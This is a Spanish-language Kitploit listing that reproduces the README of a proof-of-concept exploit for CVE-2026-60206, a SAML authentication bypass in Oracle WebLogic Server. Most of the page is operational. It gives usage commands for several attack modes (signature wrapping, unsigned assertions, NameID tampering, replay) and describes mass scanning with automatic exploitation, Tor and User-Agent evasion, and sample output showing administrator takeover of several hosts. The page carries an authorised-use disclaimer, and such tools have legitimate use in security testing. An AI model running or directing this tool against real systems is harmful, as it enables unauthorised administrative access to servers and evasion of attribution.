Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-60206 — Análisis técnico y prueba de concepto para CVE-2026-60206, una vulnerabilidad crítica de omisión de autenticación SAML en Oracle WebLogic Server. | Kitploit
Herramientas/GitHubGitHub/debajyoti0-0/cve-2026-60206
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAutenticación
GitHubdebajyoti0-0/cve-2026-60206

CVE-2026-60206

Análisis técnico y prueba de concepto para CVE-2026-60206, una vulnerabilidad crítica de omisión de autenticación SAML en Oracle WebLogic Server.

Ver Repositorio
hace 26 díasAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-60206 – PoC de omisión de autenticación SAML en Oracle WebLogic Server

Este repositorio proporciona un exploit de prueba de concepto para CVE‑2026‑60206, una vulnerabilidad crítica de omisión de autenticación en la implementación SAML de Oracle WebLogic Server. La falla permite que un atacante remoto con bajos privilegios comprometa completamente el servidor mediante la falsificación de aserciones SAML.

CVSS

⚠️ Aviso legal: Esta herramienta está destinada únicamente a investigación y pruebas de seguridad autorizadas. Úsala solo contra sistemas que poseas o sobre los que tengas permiso explícito para realizar pruebas. Los autores no asumen responsabilidad alguna por el mal uso.

CVE-2026-60206 Logo

🔥 Descripción general de la vulnerabilidad

CVE-2026-60206 afecta al componente Core de Oracle WebLogic Server. La vulnerabilidad se origina en un manejo incorrecto de la autenticación en la implementación del protocolo SAML. Múltiples vectores de ataque —como XML Signature Wrapping (XSW), aceptación de aserciones sin firmar, manipulación de NameID y omisión de audiencia/condiciones— permiten a un atacante suplantar a usuarios arbitrarios (p. ej., weblogic) y obtener acceso administrativo.

Versiones afectadas:

  • 12.2.1.4.0
  • 14.1.1.0.0
  • 14.1.2.0.0
  • 15.1.1.0.0

El PoC implementa los siguientes vectores de ataque:

  • XML Signature Wrapping (XSW) – manipulación estructural para lograr que el procesador SAML acepte una aserción sin firmar.
  • Inyección de aserción sin firmar – crear una respuesta SAML completamente sin firma (si WantAssertionsSigned no está aplicado).
  • Manipulación de NameID – confundir el mapeador de identidad mediante comentarios XML, espacios en blanco o confusión de formato.
  • Omisión de restricción de audiencia – eliminar o modificar AudienceRestriction para ampliar el alcance.
  • Omisión de condiciones/tiempo – manipular NotBefore/NotOnOrAfter para evadir las comprobaciones de validez.
  • Ataque combinado – XSW + aserción interna sin firmar + manipulación de NameID (el que tiene más probabilidades de éxito).
  • Replay – reproducir una respuesta SAML capturada con destino/destinatario modificado.

✨ Características

  • Múltiples modos de ataque – elegir entre all, unsigned, xsw, nameid, audience, conditions, combo o replay.
  • Escaneo masivo – detección concurrente y explotación opcional en numerosos objetivos (mediante -l).
  • Detección de versión – identificar con precisión la versión de WebLogic mediante cabeceras, páginas de error y WSDL.
  • Sondeo de endpoints SAML – descubrir automáticamente los endpoints SAML ACS, de metadatos y de inicio por SP.
  • Soporte para Tor – enrutar el tráfico a través de Tor (SOCKS5/HTTP/SOCKS4) para mantener el anonimato.
  • Reproducción de peticiones HTTP crudas – enviar peticiones HTTP crudas arbitrarias desde un archivo (-r).
  • Soporte HTTP/2 – usar automáticamente httpx si está instalado y recurrir a (HTTP/1.1) en caso contrario.

📦 Instalación

root@kitploit:~
git clone https://github.com/Debajyoti0-0/CVE-2026-60206.git
cd CVE-2026-60206
pip install -r requirements.txt

Requerido: requests, urllib3

Opcional (mejora la funcionalidad):

  • httpx – para soporte HTTP/2
  • lxml – para un análisis SAML mejorado
  • signxml, cryptography – para el manejo de firmas (no es necesario para la explotación)

🚀 Uso

Objetivo único – solo detección

root@kitploit:~
python CVE-2026-60206.py -t https://192.168.1.100:7002 --detect

Objetivo único – ejecutar todos los vectores de ataque

root@kitploit:~
python CVE-2026-60206.py -t https://192.168.1.100:7002 --mode all -u weblogic

Objetivo único – modo de ataque específico

root@kitploit:~
python CVE-2026-60206.py -t https://192.168.1.100:7002 --mode combo -u admin

Escaneo masivo – detectar versiones desde un archivo

root@kitploit:~
python CVE-2026-60206.py -l targets.txt -o results.json

Escaneo masivo – detectar + explotar

root@kitploit:~
python CVE-2026-60206.py -l targets.txt --exploit -o results.csv --threads 20

Reproducir una respuesta SAML capturada

root@kitploit:~
python CVE-2026-60206.py -t https://192.168.1.100:7002 --mode replay --replay-file captured.xml

Usar Tor y comprobar la conectividad

root@kitploit:~
python CVE-2026-60206.py -t https://192.168.1.100:7002 --tor --check-tor

Enviar una petición HTTP cruda desde un archivo

root@kitploit:~
python CVE-2026-60206.py -t https://192.168.1.100:7002 -r request.txt --method POST

Comprobación rápida de vulnerabilidad (sin explotación)

root@kitploit:~
python CVE-2026-60206.py -t https://192.168.1.100:7002 -c

⚙️ Referencia de flags

Opciones:

Objetivo:

FlagDescripción
-t, --target TARGETURL de un único objetivo (p. ej., https://host:7002).
-l, --list LIST

Opciones de petición:

Configuración de ataque:

Escaneo masivo (con -l):

FlagDescripción
--exploitPrueba la aserción SAML sin firmar (por defecto: solo detección).
-T, --threads THREADSHilos concurrentes (por defecto: 10).

Salida:

FlagDescripción
-v, --verboseAumenta la verbosidad (salida de depuración).
-q, --quiet

🧪 Modos en detalle

detect

Realiza la detección de versión y el sondeo de endpoints SAML. No se lanza ningún ataque.

unsigned

Inyecta una aserción SAML completamente sin firmar. Si el objetivo no aplica WantAssertionsSigned, esto omite la autenticación por completo.

Variantes: unsigned (por defecto), unsigned_stripped (elimina todas las referencias a la firma).

xsw (XML Signature Wrapping)

Coloca una aserción maliciosa sin firmar antes (o envolviendo) una aserción firmada válida. El procesador SAML puede tomar la primera aserción mientras el validador de firmas comprueba la firmada.

Variantes: xsw1 (anteposición simple), xsw2 (mismo ID que el original), xsw3 (envoltorio anidado), xsw4 (hermana).

nameid

Manipula el campo NameID para confundir el mapeador de identidad de WebLogic, lo que permite suplantar a un usuario diferente.

Variantes: comment_injection, whitespace, format_confusion, xpath_injection.

audience

Omite las comprobaciones de AudienceRestriction eliminando o modificando el elemento de audiencia.

Variantes: remove_audience, wildcard_audience, extra_audience.

conditions

Omite las restricciones basadas en tiempo (p. ej., NotBefore, NotOnOrAfter).

Variantes: future_timestamp, expired_timestamp, remove_conditions, infinite_validity.

combo

Combina XSW, aserción sin firmar y manipulación de NameID en un único payload: el vector con más probabilidades de comprometer el sistema por completo.

Variantes: combo_full (con inyección de comentarios), combo_stealth (con salto de línea).

replay

Reproduce una respuesta SAML previamente capturada, modificando opcionalmente el destino o eliminando las restricciones de audiencia.

Variantes: replay_modified (ajusta Destination/Recipient), replay_cross_sp (elimina las restricciones de audiencia).

📝 Ejemplo de flujo de trabajo (explotación de un objetivo único)

root@kitploit:~
$ python CVE-2026-60206.py -t https://192.168.1.100:7002 -u weblogic --mode combo

  ╔══════════════════════════════════════════════════════════════════════╗
  ║       CVE-2026-60206 — WebLogic SAML Authentication Bypass PoC       ║
  ║         Oracle WebLogic Server Core | CVSS 9.9 | CWE-287             ║
  ╚══════════════════════════════════════════════════════════════════════╝

🔍 Detecting WebLogic version and SAML configuration...
  Detected WebLogic version: 12.2.1.4.0
  ⚠️  Version 12.2.1.4.0 is IN SCOPE for CVE-2026-60206!
  Found SAML metadata: /saml2/sp/metadata
  Found SAML ACS: /saml2/sp/acs (HTTP 200)

============================================================
🚀 Starting comprehensive SAML attack suite
   Target: https://192.168.1.100:7002
   Target User: weblogic
============================================================

── Attack 1/2 ──
🎯 [combo/combo_full] Launching combined attack for: weblogic
✅ [combo/combo_full] Authentication bypass SUCCEEDED! Logged in as: weblogic
   ACS Endpoint: /saml2/sp/acs

── Attack 2/2 ──
🎯 [combo/combo_stealth] Launching combined attack for: weblogic
✅ [combo/combo_stealth] Authentication bypass SUCCEEDED! Logged in as: weblogic
   ACS Endpoint: /saml2/sp/acs

============================================================
📊 Results: 2/2 attack vectors succeeded
============================================================

 EXPLOIT SUCCESSFUL! 2 attack(s) bypassed authentication.
   - [combo/combo_full] → logged in as 'weblogic' via /saml2/sp/acs
   - [combo/combo_stealth] → logged in as 'weblogic' via /saml2/sp/acs
📄 Report saved: logs/report_20260725_123456.json

📝 Ejemplo de flujo de trabajo (escaneo masivo)

root@kitploit:~
$ python CVE-2026-60206.py -l targets.txt --exploit -o scan_results.csv --threads 10

============================================================
  CVE-2026-60206 Mass Scanner
  Targets: 50
  Threads: 10
  Mode:    Exploit
============================================================

  [10/50] 20.0% | Vuln:3 | Pwned:1 | 1.2 tgt/s  
  [!] VULN: https://10.0.0.5:7002 (12.2.1.4.0)
  [!!] PWNED: https://10.0.0.5:7002 - logged in as weblogic
  ... (continues) ...

============================================================
  SCAN SUMMARY
============================================================
  Total targets:   50
  Reachable:       45
  WebLogic:        12
  Vuln version:    8
  Exploited:       3
  Duration:        42.5s
============================================================

  [!!] SUCCESSFULLY EXPLOITED:
    https://10.0.0.5:7002 → weblogic via /saml2/sp/acs
    https://10.0.0.10:7002 → weblogic via /saml2/sp/acs
    https://10.0.0.15:7002 → weblogic via /saml2/sp/acs

  [!] VULNERABLE VERSIONS (not yet exploited):
    https://10.0.0.20:7002 (14.1.1.0.0)
    https://10.0.0.25:7002 (15.1.1.0.0)
    ... (truncated)

🛠️ Cómo montar un entorno de prueba vulnerable

Para probar este PoC de forma segura, configura un WebLogic Server con SAML habilitado y una de las versiones afectadas. Por ejemplo, puedes usar Docker:

root@kitploit:~
# Example (simplified – use official Oracle WebLogic images with SAML configuration)
docker run -p 7002:7002 container-registry.oracle.com/middleware/weblogic:12.2.1.4
# Then configure SAML via WebLogic console or scripts

La configuración SAML debe incluir al menos un Service Provider SAML 2.0 con un endpoint ACS (p. ej., /saml2/sp/acs) y los metadatos publicados.

🔗 Referencias

  • Aviso del Critical Patch Update de Oracle de julio de 2026
  • Detalle de CVE-2026-60206 – NIST NVD
  • CWE-287: Autenticación incorrecta
  • Análisis de seguridad SAML 2.0 – XML Signature Wrapping

📜 Licencia

Este proyecto está bajo la Licencia GNU v3.0; consulta el archivo LICENSE para más detalles.

🤝 Contribuciones

Las issues y las pull requests son bienvenidas. Asegúrate de que tus contribuciones respeten las mismas pautas de uso ético.

Recuerda: Obtén siempre la autorización adecuada antes de probar cualquier herramienta de seguridad. ¡Sé ético!

Descargar herramienta
requests
  • Rotación de User‑Agent – usar un User‑Agent aleatorio o personalizado.
  • Soporte de proxy – enviar todas las peticiones a través de un proxy HTTP/SOCKS.
  • Personalización de peticiones – establecer timeouts, reintentos y retardos, desactivar redirecciones y reintentar según un patrón regex.
  • Guardado de payloads – guardar en disco los payloads SAML generados (--save-payloads).
  • Comprobación de vulnerabilidad (-c / --check) – determinar rápidamente si un objetivo es vulnerable (sin explotación).
  • Informe de salida JSON/CSV – resultados estructurados para escaneos masivos.
  • Registro detallado (verbose) – salida de depuración detallada con consola en color.
  • FlagDescripción
    -h, --helpMuestra el mensaje de ayuda y sale.
    --proxy PROXYURL del proxy (se sobrescribe con --tor si se usa).
    --no-verifyDesactiva la verificación del certificado SSL.
    --cookie COOKIECookie(s) de sesión (p. ej., name=value; name2=value2).
    --auth AUTHCredenciales de autenticación básica (USER:PASS).
    Archivo de lista de objetivos para el escaneo masivo, o una URL única.
    -f, --file FILEAlias de --list.
    FlagDescripción
    -r, --requestfile REQUESTFILECarga una petición HTTP cruda desde un archivo (reemplaza los ataques SAML).
    --method METHODMétodo HTTP a usar (para petición cruda o petición única; por defecto: GET).
    --random-agentUsa un User‑Agent aleatorio de la lista incorporada.
    -A, --user-agent USER_AGENTValor personalizado para la cabecera User‑Agent.
    --torUsa la red de anonimato Tor (SOCKS5 por defecto).
    --tor-port TOR_PORTPuerto del proxy Tor (por defecto: 9050).
    --tor-type {HTTP,SOCKS4,SOCKS5}Tipo de proxy Tor (por defecto: SOCKS5).
    --check-torComprueba si Tor se usa correctamente (sale con un veredicto).
    --delay DELAYRetardo en segundos entre cada petición.
    --timeout TIMEOUTTiempo de espera en segundos (por defecto: 30).
    --retries RETRIESNúmero de reintentos ante timeouts/errores (por defecto: 3).
    --retry-on RETRY_ONReintenta la petición si el contenido de la respuesta coincide con el regex (p. ej., 'captcha').
    -dr, --disable-redirectsDesactiva el seguimiento de redirecciones HTTP.
    FlagDescripción
    -m, --mode {all,detect,unsigned,xsw,nameid,audience,conditions,combo,replay}Modo de ataque (por defecto: all).
    --detectDetecta únicamente la versión de WebLogic y la configuración SAML (sin ataque).
    -c, --checkComprobación rápida de vulnerabilidad (solo detección, sale con un veredicto).
    -u, --user USERUsuario objetivo a suplantar (por defecto: weblogic).
    --groups GROUPSGrupos a incluir en la aserción SAML (por defecto: Administrators,Monitors).
    --issuer ISSUERID de entidad del emisor (Issuer) SAML.
    --audience AUDIENCEID de entidad de audiencia SAML.
    --relay-state RELAY_STATEParámetro RelayState para el POST SAML.
    --base64Codifica en Base64 la respuesta SAML en el POST.
    --extra-attrs [NAME=VALUE ...]Atributos SAML adicionales (p. ej., role=admin).
    --replay-file REPLAY_FILERuta a la respuesta SAML capturada para el replay.
    --save-payloadsGuarda los payloads SAML generados en ./payloads/.
    --continue-on-successContinúa probando después de un ataque exitoso.
    Suprime la salida no esencial.
    --list-modesLista todos los modos de ataque con sus descripciones y sale.
    -o, --output OUTPUTEscribe un informe JSON o CSV en un archivo.